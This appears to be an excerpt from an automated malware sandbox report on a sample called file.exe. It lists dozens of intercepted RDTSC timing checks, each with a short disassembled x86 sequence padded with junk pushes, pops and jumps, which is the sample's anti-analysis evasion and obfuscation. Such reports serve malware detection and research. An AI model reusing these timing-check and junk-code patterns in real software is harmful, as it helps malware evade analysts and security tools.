              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659C7 second address: 11659E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FBA4947B566h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jbe 00007FBA4947B56Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11659E5 second address: 11659EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BE9E second address: 116BEA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BEA2 second address: 116BEB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FBA4947DCE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BEB1 second address: 116BEC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBA4947B566h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BEC0 second address: 116BED3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BED3 second address: 116BED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116BED7 second address: 116BEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177D3B second address: 1177D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jbe 00007FBA4947B56Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177D4C second address: 1177D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007FBA4947DCEDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177D64 second address: 1177D6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177A6B second address: 1177A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FBA4947DCEAh 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177A7E second address: 1177A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA4947B56Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177A8D second address: 1177A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1177A97 second address: 1177A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117C23B second address: 117C246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBA4947DCE6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187767 second address: 118776D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118776D second address: 1187771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187771 second address: 1187794 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA4947B566h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBA4947B573h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187794 second address: 11877D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBA4947DCF0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA4947DCEDh 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D95C second address: 118D969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D969 second address: 118D96D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D96D second address: 118D973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C492 second address: 118C4AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C4AB second address: 118C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 jnp 00007FBA4947B572h 0x0000000f je 00007FBA4947B566h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C76C second address: 118C7C7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA4947DCE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FBA4947DCEEh 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FBA4947DCF1h 0x00000019 popad 0x0000001a jmp 00007FBA4947DCF7h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FBA4947DCEDh 0x00000026 jg 00007FBA4947DCE6h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C7C7 second address: 118C7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118C7CB second address: 118C7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118D628 second address: 118D634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FBA4947B566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1193001 second address: 119300A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119300A second address: 119300E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195542 second address: 1195548 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1195548 second address: 1195553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119F0D0 second address: 119F113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA4947DCF7h 0x00000009 jmp 00007FBA4947DCF0h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FBA4947DCF2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0BFA second address: 11B0BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0BFE second address: 11B0C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBA4947DCF0h 0x0000000b pop esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0C1A second address: 11B0C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B0C1E second address: 11B0C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FBA4947DCE6h 0x00000011 popad 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2215 second address: 11B221B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B221B second address: 11B221F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B221F second address: 11B2223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2223 second address: 11B2252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007FBA4947DCE6h 0x0000000f pop ecx 0x00000010 jmp 00007FBA4947DCF8h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2252 second address: 11B226E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007FBA4947B571h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B226E second address: 11B2272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B57A2 second address: 11B57AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B57AA second address: 11B57C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 jne 00007FBA4947DCEEh 0x0000000d jbe 00007FBA4947DCE6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jne 00007FBA4947DCEEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C7ED9 second address: 11C7EE9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA4947B572h 0x00000008 jno 00007FBA4947B566h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CC551 second address: 11CC556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB54A second address: 11CB552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB552 second address: 11CB55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBA4947DCE6h 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB55D second address: 11CB569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007FBA4947B566h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CB6CA second address: 11CB6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBC7D second address: 11CBC96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FBA4947B572h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBC96 second address: 11CBC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBC9F second address: 11CBCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBE0E second address: 11CBE16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CBFB6 second address: 11CBFCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FBA4947B566h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF18E second address: 11CF1A8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBA4947DCE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FBA4947DCECh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF420 second address: 11CF426 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF426 second address: 11CF4D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FBA4947DCE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007FBA4947DCECh 0x00000029 push dword ptr [ebp+122D2991h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FBA4947DCE8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1AEDh], ebx 0x0000004f call 00007FBA4947DCE9h 0x00000054 jmp 00007FBA4947DCEAh 0x00000059 push eax 0x0000005a jnc 00007FBA4947DCF2h 0x00000060 mov eax, dword ptr [esp+04h] 0x00000064 jmp 00007FBA4947DCECh 0x00000069 mov eax, dword ptr [eax] 0x0000006b push eax 0x0000006c push edx 0x0000006d jno 00007FBA4947DCE8h 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CF4D7 second address: 11CF4E1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA4947B56Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2109 second address: 11D210F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D210F second address: 11D2113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2113 second address: 11D2119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1C64 second address: 11D1C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FBA4947B566h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1C71 second address: 11D1C75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBD8A second address: 10EBD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jnc 00007FBA4947B566h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBD9E second address: 10EBDA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A036F second address: 52A039A instructions: 0x00000000 rdtsc 0x00000002 mov ah, EBh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edx, ax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FBA4947B579h 0x00000013 pop eax 0x00000014 mov esi, ebx 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0404 second address: 52A0408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52A0408 second address: 52A040E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06D1 second address: 52C078E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBA4947DCF0h 0x00000008 adc ecx, 6192C238h 0x0000000e jmp 00007FBA4947DCEBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FBA4947DCF8h 0x0000001c sbb ax, BC98h 0x00000021 jmp 00007FBA4947DCEBh 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 jmp 00007FBA4947DCF6h 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FBA4947DCEEh 0x00000037 sub eax, 44887E28h 0x0000003d jmp 00007FBA4947DCEBh 0x00000042 popfd 0x00000043 mov ebx, eax 0x00000045 popad 0x00000046 xchg eax, ecx 0x00000047 jmp 00007FBA4947DCF2h 0x0000004c push eax 0x0000004d pushad 0x0000004e mov ah, bh 0x00000050 popad 0x00000051 xchg eax, ecx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov ah, 50h 0x00000057 call 00007FBA4947DCEDh 0x0000005c pop ecx 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C078E second address: 52C07D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA4947B56Ch 0x00000008 mov di, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FBA4947B56Ah 0x00000016 sub ah, 00000048h 0x00000019 jmp 00007FBA4947B56Bh 0x0000001e popfd 0x0000001f call 00007FBA4947B578h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C07D9 second address: 52C081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FBA4947DCEEh 0x0000000c xchg eax, esi 0x0000000d jmp 00007FBA4947DCF0h 0x00000012 lea eax, dword ptr [ebp-04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA4947DCF7h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C089D second address: 52C08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C08A1 second address: 52C08A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C08A7 second address: 52C0912 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 mov cx, 68CDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d cmp dword ptr [ebp-04h], 00000000h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FBA4947B576h 0x00000018 and al, 00000018h 0x0000001b jmp 00007FBA4947B56Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FBA4947B578h 0x00000027 add cx, 0378h 0x0000002c jmp 00007FBA4947B56Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov esi, eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0912 second address: 52C0918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0918 second address: 52C091E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C091E second address: 52C0922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0922 second address: 52C0926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0926 second address: 52C093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FBA4947DD3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C093A second address: 52C0957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0957 second address: 52C095D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C095D second address: 52C0961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0961 second address: 52C0965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C00DD second address: 52C00FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cl, 4Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C00FF second address: 52C0104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
